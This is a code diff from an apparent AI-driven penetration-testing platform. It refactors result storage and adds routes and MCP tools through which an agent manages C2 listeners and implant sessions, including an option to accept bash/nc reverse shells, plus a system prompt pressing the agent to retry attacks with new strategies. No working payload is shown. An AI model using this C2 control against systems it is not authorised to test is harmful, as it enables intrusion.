func (a *Agent) formatMinimalNotification(executionID string, toolName string, size int, lineCount int, filePath string) string {
var sb strings.Builder
sb.WriteString(fmt.Sprintf("工具执行完成。结果已保存(ID: %s)。\n\n", executionID))
sb.WriteString("结果信息:\n")
sb.WriteString(fmt.Sprintf(" - 工具: %s\n", toolName))
sb.WriteString(fmt.Sprintf(" - 大小: %d 字节 (%.2f KB)\n", size, float64(size)/1024))
sb.WriteString(fmt.Sprintf(" - 行数: %d 行\n", lineCount))
if filePath != "" {
sb.WriteString(fmt.Sprintf(" - 文件路径: %s\n", filePath))
}
sb.WriteString("\n")
sb.WriteString("推荐使用 query_execution_result 工具查询完整结果:\n")
sb.WriteString(fmt.Sprintf(" - 查询第一页: query_execution_result(execution_id=\"%s\", page=1, limit=100)\n", executionID))
sb.WriteString(fmt.Sprintf(" - 搜索关键词: query_execution_result(execution_id=\"%s\", search=\"关键词\")\n", executionID))
sb.WriteString(fmt.Sprintf(" - 过滤条件: query_execution_result(execution_id=\"%s\", filter=\"error\")\n", executionID))
sb.WriteString(fmt.Sprintf(" - 正则匹配: query_execution_result(execution_id=\"%s\", search=\"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", use_regex=true)\n", executionID))
sb.WriteString("\n")
if filePath != "" {
sb.WriteString("如果 query_execution_result 工具不满足需求,也可以使用其他工具处理文件:\n")
sb.WriteString("\n")
sb.WriteString("**分段读取示例:**\n")
sb.WriteString(fmt.Sprintf(" - 查看前100行: exec(command=\"head\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 查看后100行: exec(command=\"tail\", args=[\"-n\", \"100\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 查看第50-150行: exec(command=\"sed\", args=[\"-n\", \"50,150p\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**搜索和正则匹配示例:**\n")
sb.WriteString(fmt.Sprintf(" - 搜索关键词: exec(command=\"grep\", args=[\"关键词\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 正则匹配IP地址: exec(command=\"grep\", args=[\"-E\", \"\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 不区分大小写搜索: exec(command=\"grep\", args=[\"-i\", \"关键词\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 显示匹配行号: exec(command=\"grep\", args=[\"-n\", \"关键词\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**过滤和统计示例:**\n")
sb.WriteString(fmt.Sprintf(" - 统计总行数: exec(command=\"wc\", args=[\"-l\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 过滤包含error的行: exec(command=\"grep\", args=[\"error\", \"%s\"])\n", filePath))
sb.WriteString(fmt.Sprintf(" - 排除空行: exec(command=\"grep\", args=[\"-v\", \"^$\", \"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**完整读取(不推荐大文件):**\n")
sb.WriteString(fmt.Sprintf(" - 使用 cat 工具: cat(file=\"%s\")\n", filePath))
sb.WriteString(fmt.Sprintf(" - 使用 exec 工具: exec(command=\"cat\", args=[\"%s\"])\n", filePath))
sb.WriteString("\n")
sb.WriteString("**注意:**\n")
sb.WriteString(" - 直接读取大文件可能会再次触发大结果保存机制\n")
sb.WriteString(" - 建议优先使用分段读取和搜索功能,避免一次性加载整个文件\n")
sb.WriteString(" - 正则表达式语法遵循标准 POSIX 正则表达式规范\n")
}
return sb.String()
}
// UpdateConfig 更新OpenAI配置 // UpdateConfig 更新OpenAI配置
func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) { func (a *Agent) UpdateConfig(cfg *config.OpenAIConfig) {
a.mu.Lock() a.mu.Lock()
@@ -923,6 +788,23 @@ func (a *Agent) RecordLocalToolExecution(toolName string, args map[string]interf
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr) return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
} }
// UpdateMCPExecutionDisplayResult 将监控库中的工具结果更新为送入模型的展示正文(reduction 后)。
func (a *Agent) UpdateMCPExecutionDisplayResult(executionID, resultText string) {
if a == nil || strings.TrimSpace(executionID) == "" {
return
}
text := resultText
if strings.TrimSpace(text) == "" {
text = "(无输出)"
}
tr := &mcp.ToolResult{
Content: []mcp.Content{{Type: "text", Text: text}},
}
if a.mcpServer != nil {
_ = a.mcpServer.UpdateToolExecutionResult(executionID, tr)
}
}
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。 // CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool { func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
executionID = strings.TrimSpace(executionID) executionID = strings.TrimSpace(executionID)
+4 -222
View File
@@ -1,21 +1,16 @@
package agent package agent
import ( import (
"os"
"path/filepath"
"strings"
"testing" "testing"
"time"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap" "go.uber.org/zap"
) )
// setupTestAgent 创建测试用的Agent // setupTestAgent 创建测试用的Agent
func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) { func setupTestAgent(t *testing.T) *Agent {
logger := zap.NewNop() logger := zap.NewNop()
mcpServer := mcp.NewServer(logger) mcpServer := mcp.NewServer(logger)
@@ -26,205 +21,10 @@ func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) {
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 10, MaxIterations: 10,
LargeResultThreshold: 100, // 设置较小的阈值便于测试
ResultStorageDir: "",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10) return NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10)
// 创建测试存储
tmpDir := filepath.Join(os.TempDir(), "test_agent_storage_"+time.Now().Format("20060102_150405"))
testStorage, err := storage.NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建测试存储失败: %v", err)
}
agent.SetResultStorage(testStorage)
return agent, testStorage
}
func TestAgent_FormatMinimalNotification(t *testing.T) {
agent, testStorage := setupTestAgent(t)
_ = testStorage // 避免未使用变量警告
executionID := "test_exec_001"
toolName := "nmap_scan"
size := 50000
lineCount := 1000
filePath := "tmp/test_exec_001.txt"
notification := agent.formatMinimalNotification(executionID, toolName, size, lineCount, filePath)
// 验证通知包含必要信息
if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID: %s", executionID)
}
if !strings.Contains(notification, toolName) {
t.Errorf("通知中应该包含工具名称: %s", toolName)
}
if !strings.Contains(notification, "50000") {
t.Errorf("通知中应该包含大小信息")
}
if !strings.Contains(notification, "1000") {
t.Errorf("通知中应该包含行数信息")
}
if !strings.Contains(notification, "query_execution_result") {
t.Errorf("通知中应该包含查询工具的使用说明")
}
}
func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建模拟的MCP工具结果(大结果)
largeResult := &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: strings.Repeat("This is a test line with some content.\n", 1000), // 约50KB
},
},
IsError: false,
}
// 模拟MCP服务器返回大结果
// 由于我们需要模拟CallTool的行为,这里需要创建一个mock或者使用实际的MCP服务器
// 为了简化测试,我们直接测试结果处理逻辑
// 设置阈值
agent.mu.Lock()
agent.largeResultThreshold = 1000 // 设置较小的阈值
agent.mu.Unlock()
// 创建执行ID
executionID := "test_exec_large_001"
toolName := "test_tool"
// 格式化结果
var resultText strings.Builder
for _, content := range largeResult.Content {
resultText.WriteString(content.Text)
resultText.WriteString("\n")
}
resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果并保存
agent.mu.RLock()
threshold := agent.largeResultThreshold
storage := agent.resultStorage
agent.mu.RUnlock()
if resultSize > threshold && storage != nil {
// 保存大结果
err := storage.SaveResult(executionID, toolName, resultStr)
if err != nil {
t.Fatalf("保存大结果失败: %v", err)
}
// 生成通知
lines := strings.Split(resultStr, "\n")
filePath := storage.GetResultPath(executionID)
notification := agent.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
// 验证通知格式
if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID")
}
// 验证结果已保存
savedResult, err := storage.GetResult(executionID)
if err != nil {
t.Fatalf("获取保存的结果失败: %v", err)
}
if savedResult != resultStr {
t.Errorf("保存的结果与原始结果不匹配")
}
} else {
t.Fatal("大结果应该被检测到并保存")
}
}
func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建小结果
smallResult := &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "Small result content",
},
},
IsError: false,
}
// 设置较大的阈值
agent.mu.Lock()
agent.largeResultThreshold = 100000 // 100KB
agent.mu.Unlock()
// 格式化结果
var resultText strings.Builder
for _, content := range smallResult.Content {
resultText.WriteString(content.Text)
resultText.WriteString("\n")
}
resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果
agent.mu.RLock()
threshold := agent.largeResultThreshold
storage := agent.resultStorage
agent.mu.RUnlock()
if resultSize > threshold && storage != nil {
t.Fatal("小结果不应该被保存")
}
// 小结果应该直接返回
if resultSize <= threshold {
// 这是预期的行为
if resultStr == "" {
t.Fatal("小结果应该直接返回,不应该为空")
}
}
}
func TestAgent_SetResultStorage(t *testing.T) {
agent, _ := setupTestAgent(t)
// 创建新的存储
tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405"))
newStorage, err := storage.NewFileResultStorage(tmpDir, zap.NewNop())
if err != nil {
t.Fatalf("创建新存储失败: %v", err)
}
// 设置新存储
agent.SetResultStorage(newStorage)
// 验证存储已更新
agent.mu.RLock()
currentStorage := agent.resultStorage
agent.mu.RUnlock()
if currentStorage != newStorage {
t.Fatal("存储未正确更新")
}
// 清理
os.RemoveAll(tmpDir)
} }
func TestAgent_NewAgent_DefaultValues(t *testing.T) { func TestAgent_NewAgent_DefaultValues(t *testing.T) {
@@ -243,14 +43,6 @@ func TestAgent_NewAgent_DefaultValues(t *testing.T) {
if agent.maxIterations != 30 { if agent.maxIterations != 30 {
t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations) t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock()
threshold := agent.largeResultThreshold
agent.mu.RUnlock()
if threshold != 50*1024 {
t.Errorf("默认阈值不匹配。期望: %d, 实际: %d", 50*1024, threshold)
}
} }
func TestAgent_NewAgent_CustomConfig(t *testing.T) { func TestAgent_NewAgent_CustomConfig(t *testing.T) {
@@ -264,9 +56,7 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 20, MaxIterations: 20,
LargeResultThreshold: 100 * 1024, // 100KB
ResultStorageDir: "custom_tmp",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15) agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15)
@@ -274,12 +64,4 @@ func TestAgent_NewAgent_CustomConfig(t *testing.T) {
if agent.maxIterations != 15 { if agent.maxIterations != 15 {
t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations) t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock()
threshold := agent.largeResultThreshold
agent.mu.RUnlock()
if threshold != 100*1024 {
t.Errorf("阈值不匹配。期望: %d, 实际: %d", 100*1024, threshold)
}
} }
@@ -1,7 +1,7 @@
package agent package agent
import ( import (
"cyberstrike-ai/internal/project" "cyberstrike-ai/internal/projectprompt"
) )
// DefaultSingleAgentSystemPrompt 单代理(Eino ADK / MCP)内置系统提示;可通过 agent.system_prompt_path 覆盖为文件。 // DefaultSingleAgentSystemPrompt 单代理(Eino ADK / MCP)内置系统提示;可通过 agent.system_prompt_path 覆盖为文件。
@@ -107,7 +107,7 @@ func DefaultSingleAgentSystemPrompt() string {
- 若最近一步得到 404/空结果/无效响应,不得直接结束;至少再进行一次“同目标不同策略”的验证(如变更路径、参数、请求方法、上下文来源)。 - 若最近一步得到 404/空结果/无效响应,不得直接结束;至少再进行一次“同目标不同策略”的验证(如变更路径、参数、请求方法、上下文来源)。
- 避免无效空转:同一工具+同类参数连续失败 3 次后,必须切换策略(改工具、改入口、改假设)并说明切换原因。 - 避免无效空转:同一工具+同类参数连续失败 3 次后,必须切换策略(改工具、改入口、改假设)并说明切换原因。
` + project.FactRecordingBlackboardSection(false) + ` ` + projectprompt.FactRecordingBlackboardSection(false) + `
## 技能库(Skills)与知识库 ## 技能库(Skills)与知识库
+25 -25
View File
@@ -25,10 +25,10 @@ import (
"cyberstrike-ai/internal/logger" "cyberstrike-ai/internal/logger"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin" "cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/monitor"
"cyberstrike-ai/internal/robot" "cyberstrike-ai/internal/robot"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/skillpackage" "cyberstrike-ai/internal/skillpackage"
"cyberstrike-ai/internal/storage"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"github.com/google/uuid" "github.com/google/uuid"
@@ -100,6 +100,10 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
auditSvc.PurgeExpired() auditSvc.PurgeExpired()
audit.StartRetentionLoop(auditSvc, log.Logger) audit.StartRetentionLoop(auditSvc, log.Logger)
monitorRetention := monitor.NewService(db, cfg, log.Logger)
monitorRetention.PurgeExpired()
monitor.StartRetentionLoop(monitorRetention, log.Logger)
// 创建MCP服务器(带数据库持久化) // 创建MCP服务器(带数据库持久化)
mcpServer := mcp.NewServerWithStorage(log.Logger, db) mcpServer := mcp.NewServerWithStorage(log.Logger, db)
mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes) mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes)
@@ -130,23 +134,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
externalMCPMgr.StartAllEnabled() externalMCPMgr.StartAllEnabled()
} }
// 初始化结果存储
resultStorageDir := "tmp"
if cfg.Agent.ResultStorageDir != "" {
resultStorageDir = cfg.Agent.ResultStorageDir
}
// 确保存储目录存在
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
return nil, fmt.Errorf("创建结果存储目录失败: %w", err)
}
// 创建结果存储实例
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
if err != nil {
return nil, fmt.Errorf("初始化结果存储失败: %w", err)
}
// 创建Agent // 创建Agent
maxIterations := cfg.Agent.MaxIterations maxIterations := cfg.Agent.MaxIterations
if maxIterations <= 0 { if maxIterations <= 0 {
@@ -155,12 +142,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations) agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations)
agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode) agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode)
// 设置结果存储到Agent
agent.SetResultStorage(resultStorage)
// 设置结果存储到Executor(用于查询工具)
executor.SetResultStorage(resultStorage)
// 初始化知识库模块(如果启用) // 初始化知识库模块(如果启用)
var knowledgeManager *knowledge.Manager var knowledgeManager *knowledge.Manager
var knowledgeRetriever *knowledge.Retriever var knowledgeRetriever *knowledge.Retriever
@@ -315,6 +296,15 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath) skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath)
log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API", zap.String("skillsDir", skillsDir)) log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API", zap.String("skillsDir", skillsDir))
configDir := filepath.Dir(configPath) configDir := filepath.Dir(configPath)
plantaskRel := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.PlantaskRelDir)
if plantaskRel == "" {
plantaskRel = ".eino/plantask"
}
plantaskBase := filepath.Join(skillsDir, plantaskRel)
// Match eino_adk_run_loop: checkpoint_dir is used as configured (relative to process CWD when not absolute).
checkpointBase := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.CheckpointDir)
reductionRoot := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.ReductionRootDir)
db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot)
agent.SetPromptBaseDir(configDir) agent.SetPromptBaseDir(configDir)
agentsDir := cfg.AgentsDir agentsDir := cfg.AgentsDir
@@ -341,6 +331,7 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
} }
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger) monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
monitorHandler.SetAudit(auditSvc) monitorHandler.SetAudit(auditSvc)
monitorHandler.SetMonitorRetention(monitorRetention)
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录 monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger) notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger)
groupHandler := handler.NewGroupHandler(db, log.Logger) groupHandler := handler.NewGroupHandler(db, log.Logger)
@@ -384,9 +375,10 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
// 创建OpenAPI处理器 // 创建OpenAPI处理器
conversationHandler := handler.NewConversationHandler(db, log.Logger) conversationHandler := handler.NewConversationHandler(db, log.Logger)
conversationHandler.SetAudit(auditSvc) conversationHandler.SetAudit(auditSvc)
conversationHandler.SetTaskStopper(agentHandler)
auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger) auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger)
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger) robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler) openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, conversationHandler, agentHandler)
// 创建 App 实例(部分字段稍后填充) // 创建 App 实例(部分字段稍后填充)
app := &App{ app := &App{
@@ -845,6 +837,7 @@ func setupRoutes(
protected.PUT("/batch-tasks/:queueId/schedule-enabled", agentHandler.SetBatchQueueScheduleEnabled) protected.PUT("/batch-tasks/:queueId/schedule-enabled", agentHandler.SetBatchQueueScheduleEnabled)
protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue) protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue)
protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask) protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask)
protected.POST("/batch-tasks/:queueId/tasks/:taskId/run", agentHandler.RunSingleBatchTask)
protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask) protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask)
protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask) protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask)
@@ -892,6 +885,7 @@ func setupRoutes(
protected.POST("/config/apply", configHandler.ApplyConfig) protected.POST("/config/apply", configHandler.ApplyConfig)
protected.POST("/config/test-openai", configHandler.TestOpenAI) protected.POST("/config/test-openai", configHandler.TestOpenAI)
protected.POST("/config/test-vision", configHandler.TestVision) protected.POST("/config/test-vision", configHandler.TestVision)
protected.POST("/config/list-models", configHandler.ListModels)
// 系统设置 - 终端(执行命令,提高运维效率) // 系统设置 - 终端(执行命令,提高运维效率)
protected.POST("/terminal/run", terminalHandler.RunCommand) protected.POST("/terminal/run", terminalHandler.RunCommand)
@@ -1083,6 +1077,11 @@ func setupRoutes(
protected.GET("/projects/:id", projectHandler.GetProject) protected.GET("/projects/:id", projectHandler.GetProject)
protected.PUT("/projects/:id", projectHandler.UpdateProject) protected.PUT("/projects/:id", projectHandler.UpdateProject)
protected.DELETE("/projects/:id", projectHandler.DeleteProject) protected.DELETE("/projects/:id", projectHandler.DeleteProject)
protected.GET("/projects/:id/fact-graph", projectHandler.GetFactGraph)
protected.GET("/projects/:id/fact-edges", projectHandler.ListFactEdges)
protected.POST("/projects/:id/fact-edges", projectHandler.CreateFactEdge)
protected.DELETE("/projects/:id/fact-edges/:edgeId", projectHandler.DeleteFactEdge)
protected.POST("/projects/:id/promote-attack-chain/:conversationId", projectHandler.PromoteAttackChain)
protected.GET("/projects/:id/facts", projectHandler.ListFacts) protected.GET("/projects/:id/facts", projectHandler.ListFacts)
protected.POST("/projects/:id/facts", projectHandler.CreateFact) protected.POST("/projects/:id/facts", projectHandler.CreateFact)
protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact) protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact)
@@ -1123,6 +1122,7 @@ func setupRoutes(
c2Routes.POST("/listeners/:id/start", c2Handler.StartListener) c2Routes.POST("/listeners/:id/start", c2Handler.StartListener)
c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener) c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener)
c2Routes.GET("/sessions", c2Handler.ListSessions) c2Routes.GET("/sessions", c2Handler.ListSessions)
c2Routes.DELETE("/sessions", c2Handler.DeleteSessions)
c2Routes.GET("/sessions/:id", c2Handler.GetSession) c2Routes.GET("/sessions/:id", c2Handler.GetSession)
c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession) c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession)
c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep) c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep)
+38 -9
View File
@@ -61,6 +61,7 @@ func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webList
- stop: 停止监听器(需 listener_id - stop: 停止监听器(需 listener_id
- delete: 删除监听器(需 listener_id - delete: 删除监听器(需 listener_id
监听器类型: tcp_reverse, http_beacon, https_beacon, websocket 监听器类型: tcp_reverse, http_beacon, https_beacon, websocket
tcp_reverse 默认仅接受 CSB1 加密 BeaconAES-GCM + ImplantToken)才登记会话;经典 bash/nc 反弹需在 config.allow_legacy_shell=true(公网不推荐)。
端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort), 端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort),
InputSchema: map[string]interface{}{ InputSchema: map[string]interface{}{
"type": "object", "type": "object",
@@ -74,7 +75,7 @@ func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webList
"bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port", webListenPort), "minimum": 1, "maximum": 65535}, "bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port", webListenPort), "minimum": 1, "maximum": 65535},
"profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"}, "profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"},
"remark": map[string]interface{}{"type": "string", "description": "备注"}, "remark": map[string]interface{}{"type": "string", "description": "备注"},
"config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用"}, "config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用。tcp_reverse 可选 allow_legacy_shell:true 允许未加密经典 shell(默认 false"},
}, },
"required": []string{"action"}, "required": []string{"action"},
}, },
@@ -222,20 +223,23 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{ s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Session, Name: builtin.ToolC2Session,
Description: `C2 会话管理。通过 action 参数选择操作: Description: `C2 会话管理。通过 action 参数选择操作:
- list: 列出会话(可按 listener_id/status/os/search 过滤) - list: 列出会话(可按 listener_id/status/os/search/suspicious 过滤)
- get: 获取会话详情及最近任务历史(需 session_id - get: 获取会话详情及最近任务历史(需 session_id
- set_sleep: 设置心跳间隔(需 session_id - set_sleep: 设置心跳间隔(需 session_id
- kill: 下发 exit 任务让 implant 退出(需 session_id - kill: 下发 exit 任务让 implant 退出(需 session_id
- delete: 删除会话记录(需 session_id`, - delete: 删除单个会话记录(需 session_id
- delete_batch: 批量删除会话(需 session_ids 数组)`,
InputSchema: map[string]interface{}{ InputSchema: map[string]interface{}{
"type": "object", "type": "object",
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete", "enum": []string{"list", "get", "set_sleep", "kill", "delete"}}, "action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete/delete_batch", "enum": []string{"list", "get", "set_sleep", "kill", "delete", "delete_batch"}},
"session_id": map[string]interface{}{"type": "string", "description": "会话 IDget/set_sleep/kill/delete 需要)"}, "session_id": map[string]interface{}{"type": "string", "description": "会话 IDget/set_sleep/kill/delete 需要)"},
"session_ids": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "会话 ID 列表(delete_batch"},
"listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list"}, "listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list"},
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killedlist"}, "status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killedlist"},
"os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwinlist"}, "os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwinlist"},
"search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IPlist"}, "search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IPlist"},
"suspicious": map[string]interface{}{"type": "boolean", "description": "仅疑似误报:离线且 tcp_* / unknown / PID 0list"},
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list"}, "limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list"},
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep"}, "sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep"},
"jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100set_sleep"}, "jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100set_sleep"},
@@ -257,6 +261,9 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
if limit := int(getFloat64(params, "limit")); limit > 0 { if limit := int(getFloat64(params, "limit")); limit > 0 {
filter.Limit = limit filter.Limit = limit
} }
if v, ok := params["suspicious"].(bool); ok && v {
filter.Suspicious = true
}
sessions, err := m.DB().ListC2Sessions(filter) sessions, err := m.DB().ListC2Sessions(filter)
return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err) return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err)
@@ -274,8 +281,16 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
case "set_sleep": case "set_sleep":
sleep := int(getFloat64(params, "sleep_seconds")) sleep := int(getFloat64(params, "sleep_seconds"))
jitter := int(getFloat64(params, "jitter_percent")) jitter := int(getFloat64(params, "jitter_percent"))
err := m.DB().SetC2SessionSleep(id, sleep, jitter) task, err := m.SetSessionSleep(id, sleep, jitter)
return makeC2Result(map[string]interface{}{"updated": err == nil, "sleep_seconds": sleep, "jitter_percent": jitter}, err) out := map[string]interface{}{
"updated": err == nil,
"sleep_seconds": sleep,
"jitter_percent": jitter,
}
if task != nil {
out["task_id"] = task.ID
}
return makeC2Result(out, err)
case "kill": case "kill":
task, err := m.EnqueueTask(c2.EnqueueTaskInput{ task, err := m.EnqueueTask(c2.EnqueueTaskInput{
